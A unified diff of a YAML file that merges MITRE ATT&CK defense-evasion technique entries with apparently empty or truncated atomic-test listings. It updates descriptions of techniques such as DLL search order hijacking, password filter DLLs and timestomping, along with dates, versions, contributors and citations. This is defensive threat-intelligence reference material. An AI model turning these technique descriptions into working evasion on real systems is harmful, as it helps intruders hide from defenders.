+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -3495,8 +3561,8 @@ defense-evasion:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -3510,7 +3576,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -3536,6 +3602,10 @@ defense-evasion:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -3563,12 +3633,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1553.001:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-21T19:30:58.414Z'
       name: 'Subvert Trust Controls: Gatekeeper Bypass'
       description: |-
         Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -3664,7 +3733,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.001
     atomic_tests: []
   T1553.002:
@@ -3731,7 +3799,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.009:
     technique:
@@ -3796,11 +3863,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:27:04.900Z'
       name: 'File and Directory Permissions Modification: Windows File and Directory
         Permissions Modification'
       description: |-
@@ -3861,12 +3927,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -3892,7 +3957,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -3934,7 +3999,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.007:
     technique:
@@ -3976,7 +4040,7 @@ defense-evasion:
         Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
 
         Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:33:16.346Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Binary Proxy Execution: Msiexec'
       x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -3999,36 +4063,11 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.007
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -4052,22 +4091,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -4142,7 +4203,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -4168,7 +4228,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -4191,8 +4251,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -4288,7 +4346,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests:
     - name: Clear Bash history (rm)
@@ -4472,60 +4529,71 @@ defense-evasion:
         elevation_required: true
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -4592,7 +4660,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests:
     - name: Base64 decoding with Python
@@ -4891,17 +4958,20 @@ defense-evasion:
         elevation_required: false
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -4910,15 +4980,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -4956,15 +5028,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests:
     - name: Disable journal logging via systemctl utility
@@ -5024,7 +5098,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -5072,13 +5146,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -5094,7 +5166,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -5119,6 +5191,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -5136,8 +5209,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -5150,12 +5223,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -5192,9 +5264,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -5232,9 +5303,8 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests:
     - name: Copy and Delete Mailbox Data on Linux
@@ -5301,7 +5371,7 @@ defense-evasion:
         elevation_required: true
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -5404,12 +5474,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -5493,7 +5562,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -5560,60 +5628,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
